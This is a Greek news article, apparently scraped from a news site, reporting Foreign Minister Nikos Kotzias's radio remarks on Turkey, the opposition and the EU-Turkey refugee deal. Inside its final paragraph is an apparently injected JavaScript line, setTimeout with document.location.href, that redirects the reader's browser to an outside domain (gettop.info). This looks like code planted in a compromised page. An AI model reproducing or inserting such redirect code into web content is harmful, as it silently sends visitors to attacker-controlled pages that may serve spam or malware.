Κοτζιάς: Το ΥΠΕΞ είναι πολύ προσεκτικό – Να σταματήσει η ανόητη αντιπολίτευση

  0
  2

   

  Σε ραδιοφωνική του συνέντευξη ο υπουργός Εξωτερικών Νίκος Κοτζιάς τόνισε πως το υπουργείο είναι πολύ προσεχτικό και μελετά τις επίσημες τουρκικές ιστοσελίδες με αφορμή τις επικρίσεις της αντιπολίτευσης.

  Ο υπουργός χαρακτήρισε γελοιότητες τα όσα αναφέρουν ελληνικά δημοσιεύματα, ότι το υπουργείο παρασύρθηκε από το τηλεγράφημα του ΑΠΕ-ΜΠΕ και ζήτησε να σταματήσει η ανόητη αντιπολίτευση που μόνο κακό κάνει.

  Μιλώντας στον ραδιοφωνικό σταθμό «Στο Κόκκινο 105,5» ο Νίκος Κοτζιάς τόνισε ότι εδώ και καιρό έχει υποστηρίξει πως η Τουρκία είναι μια νευρική δύναμη καθώς στο εσωτερικό της έχει πολλές αντιφάσεις, ενώ πιέζεται και από την κατάσταση σε Συρία και Ιράκ.

  Ωστόσο, υπογράμμισε πως εκείνες οι τουρκικές δυνάμεις που ονειρεύονται αναθεώρηση των Συνθηκών κάνουν λάθος, ενώ όπως τόνισε, οι όποιες δηλώσεις γίνονται με το βλέμμα στη Μοσούλη και όχι στην Ελλάδα. Παράλληλα, τόνισε πως η Τουρκία, δεν θέλει να δημιουργηθούν κουρδικές ζώνες σε Συρία και Ιράκ.

  Σχετικά με τη συμφωνία Τουρκίας-ΕΕ για το προσφυγικό, ο υπουργός Εξωτερικών είπε ότι η γειτονική χώρα έχει μια δυσπιστία απέναντι στην Ευρωπαϊκή Ένωση, για το εάν θα υλοποιήσει τις δεσμεύσεις της. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

  ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

  Please enter your comment!
  Please enter your name here